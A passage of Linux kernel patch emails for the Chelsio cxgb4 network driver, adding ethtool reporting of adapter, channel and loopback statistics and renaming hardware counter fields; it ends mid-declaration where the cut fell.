v6.tcpOutSegs; + stats->iw.tcpInSegs = v4.tcp_in_segs + v6.tcp_in_segs; + stats->iw.tcpOutSegs = v4.tcp_out_segs + v6.tcp_out_segs; + stats->iw.tcpRetransSegs = v4.tcp_retrans_segs + v6.tcp_retrans_segs; + stats->iw.tcpOutRsts = v4.tcp_out_rsts + v6.tcp_out_rsts; return 0; } diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 4d3a8c20eb12..2d9bc621cc97 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -198,23 +198,34 @@ struct lb_port_stats { }; struct tp_tcp_stats { - u32 tcpOutRsts; - u64 tcpInSegs; - u64 tcpOutSegs; - u64 tcpRetransSegs; + u32 tcp_out_rsts; + u64 tcp_in_segs; + u64 tcp_out_segs; + u64 tcp_retrans_segs; +}; + +struct tp_usm_stats { + u32 frames; + u32 drops; + u64 octets; }; struct tp_err_stats { - u32 macInErrs[4]; - u32 hdrInErrs[4]; - u32 tcpInErrs[4]; - u32 tnlCongDrops[4]; - u32 ofldChanDrops[4]; - u32 tnlTxDrops[4]; - u32 ofldVlanDrops[4]; - u32 tcp6InErrs[4]; - u32 ofldNoNeigh; - u32 ofldCongDefer; + u32 mac_in_errs[4]; + u32 hdr_in_errs[4]; + u32 tcp_in_errs[4]; + u32 tnl_cong_drops[4]; + u32 ofld_chan_drops[4]; + u32 tnl_tx_drops[4]; + u32 ofld_vlan_drops[4]; + u32 tcp6_in_errs[4]; + u32 ofld_no_neigh; + u32 ofld_cong_defer; +}; + +struct tp_rdma_stats { + u32 rqe_dfr_pkt; + u32 rqe_dfr_mod; }; struct sge_params { @@ -446,6 +457,7 @@ struct port_info { u8 rss_mode; struct link_config link_cfg; u16 *rss; + struct port_stats stats_base; #ifdef CONFIG_CHELSIO_T4_DCB struct port_dcb_info dcb; /* Data Center Bridging support */ #endif @@ -686,6 +698,12 @@ struct l2t_data; #endif +struct doorbell_stats { + u32 db_drop; + u32 db_empty; + u32 db_full; +}; + struct adapter { void __iomem *regs; void __iomem *bar2; @@ -710,6 +728,7 @@ struct adapter { char desc[IFNAMSIZ + 10]; } msix_info[MAX_INGQ + 1]; + struct doorbell_stats db_stats; struct sge sge; struct net_device *port[MAX_NPORTS]; @@ -864,6 +883,11 @@ enum { VLAN_REWRITE }; +static inline int is_offload(const struct adapter *adap) +{ + return adap->params.offload; +} + static inline int is_t6(enum chip_type chip) { return CHELSIO_CHIP_VERSION(chip) == CHELSIO_T6; @@ -1287,11 +1311,17 @@ int t4_cim_read_la(struct adapter *adap, u32 *la_buf, unsigned int *wrptr); void t4_read_cimq_cfg(struct adapter *adap, u16 *base, u16 *size, u16 *thres); const char *t4_get_port_type_description(enum fw_port_type port_type); void t4_get_port_stats(struct adapter *adap, int idx, struct port_stats *p); +void t4_get_port_stats_offset(struct adapter *adap, int idx, + struct port_stats *stats, + struct port_stats *offset); void t4_read_mtu_tbl(struct adapter *adap, u16 *mtus, u8 *mtu_log); void t4_read_cong_tbl(struct adapter *adap, u16 incr[NMTUS][NCCTRL_WIN]); void t4_tp_wr_bits_indirect(struct adapter *adap, unsigned int addr, unsigned int mask, unsigned int val); void t4_tp_read_la(struct adapter *adap, u64 *la_buf, unsigned int *wrptr); +void t4_tp_get_err_stats(struct adapter *adap, struct tp_err_stats *st); +void t4_tp_get_rdma_stats(struct adapter *adap, struct tp_rdma_stats *st); +void t4_get_usm_stats(struct adapter *adap, struct tp_usm_stats *st); void t4_tp_get_tcp_stats(struct adapter *adap, struct tp_tcp_stats *v4, struct tp_tcp_stats *v6); void t4_load_mtus(struct adapter *adap, const unsigned short *mtus, diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c index 13d5101a0d9f..63b1ae608d1f 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c @@ -108,15 +108,37 @@ static const char stats_strings[][ETH_GSTRING_LEN] = { "VLANinsertions ", "GROpackets ", "GROmerged ", - "WriteCoalSuccess ", - "WriteCoalFail ", +}; + +static char adapter_stats_strings[][ETH_GSTRING_LEN] = { + "db_drop ", + "db_full ", + "db_empty ", + "tcp_ipv4_out_rsts ", + "tcp_ipv4_in_segs ", + "tcp_ipv4_out_segs ", + "tcp_ipv4_retrans_segs ", + "tcp_ipv6_out_rsts ", + "tcp_ipv6_in_segs ", + "tcp_ipv6_out_segs ", + "tcp_ipv6_retrans_segs ", + "usm_ddp_frames ", + "usm_ddp_octets ", + "usm_ddp_drops ", + "rdma_no_rqe_mod_defer ", + "rdma_no_rqe_pkt_defer ", + "tp_err_ofld_no_neigh ", + "tp_err_ofld_cong_defer ", + "write_coal_success ", + "write_coal_fail ", }; static int get_sset_count(struct net_device *dev, int sset) { switch (sset) { case ETH_SS_STATS: - return ARRAY_SIZE(stats_strings); + return ARRAY_SIZE(stats_strings) + + ARRAY_SIZE(adapter_stats_strings); default: return -EOPNOTSUPP; } @@ -168,8 +190,12 @@ static void get_drvinfo(struct net_device *dev, struct ethtool_drvinfo *info) static void get_strings(struct net_device *dev, u32 stringset, u8 *data) { - if (stringset == ETH_SS_STATS) + if (stringset == ETH_SS_STATS) { memcpy(data, stats_strings, sizeof(stats_strings)); + data += sizeof(stats_strings); + memcpy(data, adapter_stats_strings, + sizeof(adapter_stats_strings)); + } } /* port stats maintained per queue of the port. They should be in the same @@ -185,6 +211,29 @@ struct queue_port_stats { u64 gro_merged; }; +struct adapter_stats { + u64 db_drop; + u64 db_full; + u64 db_empty; + u64 tcp_v4_out_rsts; + u64 tcp_v4_in_segs; + u64 tcp_v4_out_segs; + u64 tcp_v4_retrans_segs; + u64 tcp_v6_out_rsts; + u64 tcp_v6_in_segs; + u64 tcp_v6_out_segs; + u64 tcp_v6_retrans_segs; + u64 frames; + u64 octets; + u64 drops; + u64 rqe_dfr_mod; + u64 rqe_dfr_pkt; + u64 ofld_no_neigh; + u64 ofld_cong_defer; + u64 wc_success; + u64 wc_fail; +}; + static void collect_sge_port_stats(const struct adapter *adap, const struct port_info *p, struct queue_port_stats *s) @@ -205,30 +254,74 @@ static void collect_sge_port_stats(const struct adapter *adap, } } +static void collect_adapter_stats(struct adapter *adap, struct adapter_stats *s) +{ + struct tp_tcp_stats v4, v6; + struct tp_rdma_stats rdma_stats; + struct tp_err_stats err_stats; + struct tp_usm_stats usm_stats; + u64 val1, val2; + + memset(s, 0, sizeof(*s)); + + spin_lock(&adap->stats_lock); + t4_tp_get_tcp_stats(adap, &v4, &v6); + t4_tp_get_rdma_stats(adap, &rdma_stats); + t4_get_usm_stats(adap, &usm_stats); + t4_tp_get_err_stats(adap, &err_stats); + spin_unlock(&adap->stats_lock); + + s->db_drop = adap->db_stats.db_drop; + s->db_full = adap->db_stats.db_full; + s->db_empty = adap->db_stats.db_empty; + + s->tcp_v4_out_rsts = v4.tcp_out_rsts; + s->tcp_v4_in_segs = v4.tcp_in_segs; + s->tcp_v4_out_segs = v4.tcp_out_segs; + s->tcp_v4_retrans_segs = v4.tcp_retrans_segs; + s->tcp_v6_out_rsts = v6.tcp_out_rsts; + s->tcp_v6_in_segs = v6.tcp_in_segs; + s->tcp_v6_out_segs = v6.tcp_out_segs; + s->tcp_v6_retrans_segs = v6.tcp_retrans_segs; + + if (is_offload(adap)) { + s->frames = usm_stats.frames; + s->octets = usm_stats.octets; + s->drops = usm_stats.drops; + s->rqe_dfr_mod = rdma_stats.rqe_dfr_mod; + s->rqe_dfr_pkt = rdma_stats.rqe_dfr_pkt; + } + + s->ofld_no_neigh = err_stats.ofld_no_neigh; + s->ofld_cong_defer = err_stats.ofld_cong_defer; + + if (!is_t4(adap->params.chip)) { + int v; + + v = t4_read_reg(adap, SGE_STAT_CFG_A); + if (STATSOURCE_T5_G(v) == 7) { + val2 = t4_read_reg(adap, SGE_STAT_MATCH_A); + val1 = t4_read_reg(adap, SGE_STAT_TOTAL_A); + s->wc_success = val1 - val2; + s->wc_fail = val2; + } + } +} + static void get_stats(struct net_device *dev, struct ethtool_stats *stats, u64 *data) { struct port_info *pi = netdev_priv(dev); struct adapter *adapter = pi->adapter; - u32 val1, val2; - t4_get_port_stats(adapter, pi->tx_chan, (struct port_stats *)data); + t4_get_port_stats_offset(adapter, pi->tx_chan, + (struct port_stats *)data, + &pi->stats_base); data += sizeof(struct port_stats) / sizeof(u64); collect_sge_port_stats(adapter, pi, (struct queue_port_stats *)data); data += sizeof(struct queue_port_stats) / sizeof(u64); - if (!is_t4(adapter->params.chip)) { - t4_write_reg(adapter, SGE_STAT_CFG_A, STATSOURCE_T5_V(7)); - val1 = t4_read_reg(adapter, SGE_STAT_TOTAL_A); - val2 = t4_read_reg(adapter, SGE_STAT_MATCH_A); - *data = val1 - val2; - data++; - *data = val2; - data++; - } else { - memset(data, 0, 2 * sizeof(u64)); - *data += 2; - } + collect_adapter_stats(adapter, (struct adapter_stats *)data); } static void get_regs(struct net_device *dev, struct ethtool_regs *regs, diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index a589591e5b63..305715484004 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -1353,11 +1353,6 @@ static u16 cxgb_select_queue(struct net_device *dev, struct sk_buff *skb, return fallback(dev, skb) % dev->real_num_tx_queues; } -static inline int is_offload(const struct adapter *adap) -{ - return adap->params.offload; -} - static int closest_timer(const struct sge *s, int time) { int i, delta, match = 0, min_delta = INT_MAX; @@ -2889,7 +2884,8 @@ static struct rtnl_link_stats64 *cxgb_get_stats(struct net_device *dev, spin_unlock(&adapter->stats_lock); return ns; } - t4_get_port_stats(adapter, p->tx_chan, &stats); + t4_get_port_stats_offset(adapter, p->tx_chan, &stats, + &p->stats_base); spin_unlock(&adapter->stats_lock); ns->tx_bytes = stats.tx_octets; @@ -4680,6 +4676,8 @@ static int init_one(struct pci_dev *pdev, const struct pci_device_id *ent) err = -ENOMEM; goto out_free_adapter; } + t4_write_reg(adapter, SGE_STAT_CFG_A, + STATSOURCE_T5_V(7) | STATMODE_V(0)); } setup_memwin(adapter); diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index 35a44db29347..79b2714f1881 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -3760,24 +3760,105 @@ void t4_tp_get_tcp_stats(struct adapter *adap, struct tp_tcp_stats *v4, if (v4) { t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, val, ARRAY_SIZE(val), TP_MIB_TCP_OUT_RST_A); - v4->tcpOutRsts = STAT(OUT_RST); - v4->tcpInSegs = STAT64(IN_SEG); - v4->tcpOutSegs = STAT64(OUT_SEG); - v4->tcpRetransSegs = STAT64(RXT_SEG); + v4->tcp_out_rsts = STAT(OUT_RST); + v4->tcp_in_segs = STAT64(IN_SEG); + v4->tcp_out_segs = STAT64(OUT_SEG); + v4->tcp_retrans_segs = STAT64(RXT_SEG); } if (v6) { t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, val, ARRAY_SIZE(val), TP_MIB_TCP_V6OUT_RST_A); - v6->tcpOutRsts = STAT(OUT_RST); - v6->tcpInSegs = STAT64(IN_SEG); - v6->tcpOutSegs = STAT64(OUT_SEG); - v6->tcpRetransSegs = STAT64(RXT_SEG); + v6->tcp_out_rsts = STAT(OUT_RST); + v6->tcp_in_segs = STAT64(IN_SEG); + v6->tcp_out_segs = STAT64(OUT_SEG); + v6->tcp_retrans_segs = STAT64(RXT_SEG); } #undef STAT64 #undef STAT #undef STAT_IDX } +/** + * t4_tp_get_err_stats - read TP's error MIB counters + * @adap: the adapter + * @st: holds the counter values + * + * Returns the values of TP's error counters. + */ +void t4_tp_get_err_stats(struct adapter *adap, struct tp_err_stats *st) +{ + /* T6 and later has 2 channels */ + if (adap->params.arch.nchan == NCHAN) { + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->mac_in_errs, 12, TP_MIB_MAC_IN_ERR_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->tnl_cong_drops, 8, + TP_MIB_TNL_CNG_DROP_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->tnl_tx_drops, 4, + TP_MIB_TNL_DROP_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->ofld_vlan_drops, 4, + TP_MIB_OFD_VLN_DROP_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->tcp6_in_errs, 4, + TP_MIB_TCP_V6IN_ERR_0_A); + } else { + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->mac_in_errs, 2, TP_MIB_MAC_IN_ERR_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->hdr_in_errs, 2, TP_MIB_HDR_IN_ERR_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->tcp_in_errs, 2, TP_MIB_TCP_IN_ERR_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->tnl_cong_drops, 2, + TP_MIB_TNL_CNG_DROP_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->ofld_chan_drops, 2, + TP_MIB_OFD_CHN_DROP_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->tnl_tx_drops, 2, TP_MIB_TNL_DROP_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->ofld_vlan_drops, 2, + TP_MIB_OFD_VLN_DROP_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + st->tcp6_in_errs, 2, TP_MIB_TCP_V6IN_ERR_0_A); + } + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, + &st->ofld_no_neigh, 2, TP_MIB_OFD_ARP_DROP_A); +} + +/** + * t4_tp_get_rdma_stats - read TP's RDMA MIB counters + * @adap: the adapter + * @st: holds the counter values + * + * Returns the values of TP's RDMA counters. + */ +void t4_tp_get_rdma_stats(struct adapter *adap, struct tp_rdma_stats *st) +{ + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, &st->rqe_dfr_pkt, + 2, TP_MIB_RQE_DFR_PKT_A); +} + +/** + * t4_get_usm_stats - read TP's non-TCP DDP MIB counters + * @adap: the adapter + * @st: holds the counter values + * + * Returns the values of TP's counters for non-TCP directly-placed packets. + */ +void t4_get_usm_stats(struct adapter *adap, struct tp_usm_stats *st) +{ + u32 val[4]; + + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, val, 4, + TP_MIB_USM_PKTS_A); + st->frames = val[0]; + st->drops = val[1]; + st->octets = ((u64)val[2] << 32) | val[3]; +} + /** * t4_read_mtu_tbl - returns the values in the HW path MTU table * @adap: the adapter @@ -4034,6 +4115,28 @@ const char *t4_get_port_type_description(enum fw_port_type port_type) return "UNKNOWN"; } +/** + * t4_get_port_stats_offset - collect port stats relative to a previous + * snapshot + * @adap: The adapter + * @idx: The port + * @stats: Current stats to fill + * @offset: Previous stats snapshot + */ +void t4_get_port_stats_offset(struct adapter *adap, int idx, + struct port_stats *stats, + struct port_stats *offset) +{ + u64 *s, *o; + int i; + + t4_get_port_stats(adap, idx, stats); + for (i = 0, s = (u64 *)stats, o = (u64 *)offset; + i < (sizeof(struct port_stats) / sizeof(u64)); + i++, s++, o++) + *s -= *o; +} + /** * t4_get_port_stats - collect port statistics * @adap: the adapter diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h b/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h index c7fc3d3068f9..d75a80ea03bf 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h @@ -462,8 +462,13 @@ #define SGE_STAT_MATCH_A 0x10e8 #define SGE_STAT_CFG_A 0x10ec +#define STATMODE_S 2 +#define STATMODE_V(x) ((x) << STATMODE_S) + #define STATSOURCE_T5_S 9 +#define STATSOURCE_T5_M 0xfU #define STATSOURCE_T5_V(x) ((x) << STATSOURCE_T5_S) +#define STATSOURCE_T5_G(x) (((x) >> STATSOURCE_T5_S) & STATSOURCE_T5_M) #define SGE_DBFIFO_STATUS2_A 0x1118 @@ -1417,6 +1422,8 @@ #define CSUM_HAS_PSEUDO_HDR_F CSUM_HAS_PSEUDO_HDR_V(1U) #define TP_MIB_MAC_IN_ERR_0_A 0x0 +#define TP_MIB_HDR_IN_ERR_0_A 0x4 +#define TP_MIB_TCP_IN_ERR_0_A 0x8 #define TP_MIB_TCP_OUT_RST_A 0xc #define TP_MIB_TCP_IN_SEG_HI_A 0x10 #define TP_MIB_TCP_IN_SEG_LO_A 0x11 @@ -1425,11 +1432,14 @@ #define TP_MIB_TCP_RXT_SEG_HI_A 0x14 #define TP_MIB_TCP_RXT_SEG_LO_A 0x15 #define TP_MIB_TNL_CNG_DROP_0_A 0x18 +#define TP_MIB_OFD_CHN_DROP_0_A 0x1c #define TP_MIB_TCP_V6IN_ERR_0_A 0x28 #define TP_MIB_TCP_V6OUT_RST_A 0x2c #define TP_MIB_OFD_ARP_DROP_A 0x36 #define TP_MIB_TNL_DROP_0_A 0x44 #define TP_MIB_OFD_VLN_DROP_0_A 0x58 +#define TP_MIB_USM_PKTS_A 0x5c +#define TP_MIB_RQE_DFR_PKT_A 0x64 #define ULP_TX_INT_CAUSE_A 0x8dcc From a622297535b675d4444da88c499e1c35167f4622 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Wed, 3 Jun 2015 21:04:40 +0530 Subject: [PATCH 677/872] cxgb4: Add support in ethtool to dump channel stats Add support in ethtool to dump adapter channel stats Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 14 ++++ .../ethernet/chelsio/cxgb4/cxgb4_ethtool.c | 75 ++++++++++++++++++- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 43 +++++++++++ drivers/net/ethernet/chelsio/cxgb4/t4_regs.h | 5 ++ 4 files changed, 136 insertions(+), 1 deletion(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 2d9bc621cc97..c8bc58987c7f 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -210,6 +210,12 @@ struct tp_usm_stats { u64 octets; }; +struct tp_fcoe_stats { + u32 frames_ddp; + u32 frames_drop; + u64 octets_ddp; +}; + struct tp_err_stats { u32 mac_in_errs[4]; u32 hdr_in_errs[4]; @@ -223,6 +229,11 @@ struct tp_err_stats { u32 ofld_cong_defer; }; +struct tp_cpl_stats { + u32 req[4]; + u32 rsp[4]; +}; + struct tp_rdma_stats { u32 rqe_dfr_pkt; u32 rqe_dfr_mod; @@ -1320,10 +1331,13 @@ void t4_tp_wr_bits_indirect(struct adapter *adap, unsigned int addr, unsigned int mask, unsigned int val); void t4_tp_read_la(struct adapter *adap, u64 *la_buf, unsigned int *wrptr); void t4_tp_get_err_stats(struct adapter *adap, struct tp_err_stats *st); +void t4_tp_get_cpl_stats(struct adapter *adap, struct tp_cpl_stats *st); void t4_tp_get_rdma_stats(struct adapter *adap, struct tp_rdma_stats *st); void t4_get_usm_stats(struct adapter *adap, struct tp_usm_stats *st); void t4_tp_get_tcp_stats(struct adapter *adap, struct tp_tcp_stats *v4, struct tp_tcp_stats *v6); +void t4_get_fcoe_stats(struct adapter *adap, unsigned int idx, + struct tp_fcoe_stats *st); void t4_load_mtus(struct adapter *adap, const unsigned short *mtus, const unsigned short *alpha, const unsigned short *beta); diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c index 63b1ae608d1f..ada33c21b8c0 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c @@ -133,12 +133,30 @@ static char adapter_stats_strings[][ETH_GSTRING_LEN] = { "write_coal_fail ", }; +static char channel_stats_strings[][ETH_GSTRING_LEN] = { + "--------Channel--------- ", + "tp_cpl_requests ", + "tp_cpl_responses ", + "tp_mac_in_errs ", + "tp_hdr_in_errs ", + "tp_tcp_in_errs ", + "tp_tcp6_in_errs ", + "tp_tnl_cong_drops ", + "tp_tnl_tx_drops ", + "tp_ofld_vlan_drops ", + "tp_ofld_chan_drops ", + "fcoe_octets_ddp ", + "fcoe_frames_ddp ", + "fcoe_frames_drop ", +}; + static int get_sset_count(struct net_device *dev, int sset) { switch (sset) { case ETH_SS_STATS: return ARRAY_SIZE(stats_strings) + - ARRAY_SIZE(adapter_stats_strings); + ARRAY_SIZE(adapter_stats_strings) + + ARRAY_SIZE(channel_stats_strings); default: return -EOPNOTSUPP; } @@ -195,6 +213,9 @@ static void get_strings(struct net_device *dev, u32 stringset, u8 *data) data += sizeof(stats_strings); memcpy(data, adapter_stats_strings, sizeof(adapter_stats_strings)); + data += sizeof(adapter_stats_strings); + memcpy(data, channel_stats_strings, + sizeof(channel_stats_strings)); } } @@ -234,6 +255,22 @@ struct adapter_stats { u64 wc_fail; }; +struct channel_stats { + u64 cpl_req; + u64 cpl_rsp; + u64 mac_in_errs; + u64 hdr_in_errs; + u64 tcp_in_errs; + u64 tcp6_in_errs; + u64 tnl_cong_drops; + u64 tnl_tx_drops; + u64 ofld_vlan_drops; + u64 ofld_chan_drops; + u64 octets_ddp; + u64 frames_ddp; + u64 frames_drop; +}; + static void collect_sge_port_stats(const struct adapter *adap, const struct port_info *p, struct queue_port_stats *s) @@ -308,6 +345,36 @@ static void collect_adapter_stats(struct adapter *adap, struct adapter_stats *s) } } +static void collect_channel_stats(struct adapter *adap, struct channel_stats *s, + u8 i) +{ + struct tp_cpl_stats cpl_stats; + struct tp_err_stats err_stats; + struct tp_fcoe_stats fcoe_stats; + + memset(s, 0, sizeof(*s)); + + spin_lock(&adap->stats_lock); + t4_tp_get_cpl_stats(adap, &cpl_stats); + t4_tp_get_err_stats(adap, &err_stats); + t4_get_fcoe_stats(adap, i, &fcoe_stats); + spin_unlock(&adap->stats_lock); + + s->cpl_req = cpl_stats.req[i]; + s->cpl_rsp = cpl_stats.rsp[i]; + s->mac_in_errs = err_stats.mac_in_errs[i]; + s->hdr_in_errs = err_stats.hdr_in_errs[i]; + s->tcp_in_errs = err_stats.tcp_in_errs[i]; + s->tcp6_in_errs = err_stats.tcp6_in_errs[i]; + s->tnl_cong_drops = err_stats.tnl_cong_drops[i]; + s->tnl_tx_drops = err_stats.tnl_tx_drops[i]; + s->ofld_vlan_drops = err_stats.ofld_vlan_drops[i]; + s->ofld_chan_drops = err_stats.ofld_chan_drops[i]; + s->octets_ddp = fcoe_stats.octets_ddp; + s->frames_ddp = fcoe_stats.frames_ddp; + s->frames_drop = fcoe_stats.frames_drop; +} + static void get_stats(struct net_device *dev, struct ethtool_stats *stats, u64 *data) { @@ -322,6 +389,12 @@ static void get_stats(struct net_device *dev, struct ethtool_stats *stats, collect_sge_port_stats(adapter, pi, (struct queue_port_stats *)data); data += sizeof(struct queue_port_stats) / sizeof(u64); collect_adapter_stats(adapter, (struct adapter_stats *)data); + data += sizeof(struct adapter_stats) / sizeof(u64); + + *data++ = (u64)pi->port_id; + collect_channel_stats(adapter, (struct channel_stats *)data, + pi->port_id); + } static void get_regs(struct net_device *dev, struct ethtool_regs *regs, diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index 79b2714f1881..e8bfe6f0dd7c 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -3828,6 +3828,27 @@ void t4_tp_get_err_stats(struct adapter *adap, struct tp_err_stats *st) &st->ofld_no_neigh, 2, TP_MIB_OFD_ARP_DROP_A); } +/** + * t4_tp_get_cpl_stats - read TP's CPL MIB counters + * @adap: the adapter + * @st: holds the counter values + * + * Returns the values of TP's CPL counters. + */ +void t4_tp_get_cpl_stats(struct adapter *adap, struct tp_cpl_stats *st) +{ + /* T6 and later has 2 channels */ + if (adap->params.arch.nchan == NCHAN) { + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, st->req, + 8, TP_MIB_CPL_IN_REQ_0_A); + } else { + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, st->req, + 2, TP_MIB_CPL_IN_REQ_0_A); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, st->rsp, + 2, TP_MIB_CPL_OUT_RSP_0_A); + } +} + /** * t4_tp_get_rdma_stats - read TP's RDMA MIB counters * @adap: the adapter @@ -3841,6 +3862,28 @@ void t4_tp_get_rdma_stats(struct adapter *adap, struct tp_rdma_stats *st) 2, TP_MIB_RQE_DFR_PKT_A); } +/** + * t4_get_fcoe_stats - read TP's FCoE MIB counters for a port + * @adap: the adapter + * @idx: the port index + * @st: holds the counter values + * + * Returns the values of TP's FCoE counters for the selected port. + */ +void t4_get_fcoe_stats(struct adapter *adap, unsigned int idx, + struct tp_fcoe_stats *st) +{ + u32 val[2]; + + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, &st->frames_ddp, + 1, TP_MIB_FCOE_DDP_0_A + idx); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, &st->frames_drop, + 1, TP_MIB_FCOE_DROP_0_A + idx); + t4_read_indirect(adap, TP_MIB_INDEX_A, TP_MIB_DATA_A, val, + 2, TP_MIB_FCOE_BYTE_0_HI_A + 2 * idx); + st->octets_ddp = ((u64)val[0] << 32) | val[1]; +} + /** * t4_get_usm_stats - read TP's non-TCP DDP MIB counters * @adap: the adapter diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h b/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h index d75a80ea03bf..3273a4c67e84 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_regs.h @@ -1436,7 +1436,12 @@ #define TP_MIB_TCP_V6IN_ERR_0_A 0x28 #define TP_MIB_TCP_V6OUT_RST_A 0x2c #define TP_MIB_OFD_ARP_DROP_A 0x36 +#define TP_MIB_CPL_IN_REQ_0_A 0x38 +#define TP_MIB_CPL_OUT_RSP_0_A 0x3c #define TP_MIB_TNL_DROP_0_A 0x44 +#define TP_MIB_FCOE_DDP_0_A 0x48 +#define TP_MIB_FCOE_DROP_0_A 0x4c +#define TP_MIB_FCOE_BYTE_0_HI_A 0x50 #define TP_MIB_OFD_VLN_DROP_0_A 0x58 #define TP_MIB_USM_PKTS_A 0x5c #define TP_MIB_RQE_DFR_PKT_A 0x64 From 65046e84144f5f462107a313b404bcbd52d6dd93 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Wed, 3 Jun 2015 21:04:41 +0530 Subject: [PATCH 678/872] cxgb4: Add support to dump loopback port stats Add support in ethtool to dump loopback port statistics Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 1 + .../ethernet/chelsio/cxgb4/cxgb4_ethtool.c | 43 ++++++++++++++++- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 48 +++++++++++++++++++ drivers/net/ethernet/chelsio/cxgb4/t4_regs.h | 1 + 4 files changed, 92 insertions(+), 1 deletion(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index c8bc58987c7f..9aab32e8c38a 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -1325,6 +1325,7 @@ void t4_get_port_stats(struct adapter *adap, int idx, struct port_stats *p); void t4_get_port_stats_offset(struct adapter *adap, int idx, struct port_stats *stats, struct port_stats *offset); +void t4_get_lb_stats(struct adapter *adap, int idx, struct lb_port_stats *p); void t4_read_mtu_tbl(struct adapter *adap, u16 *mtus, u8 *mtu_log); void t4_read_cong_tbl(struct adapter *adap, u16 incr[NMTUS][NCCTRL_WIN]); void t4_tp_wr_bits_indirect(struct adapter *adap, unsigned int addr, diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c index ada33c21b8c0..36f6ff2648b3 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c @@ -150,13 +150,40 @@ static char channel_stats_strings[][ETH_GSTRING_LEN] = { "fcoe_frames_drop ", }; +static char 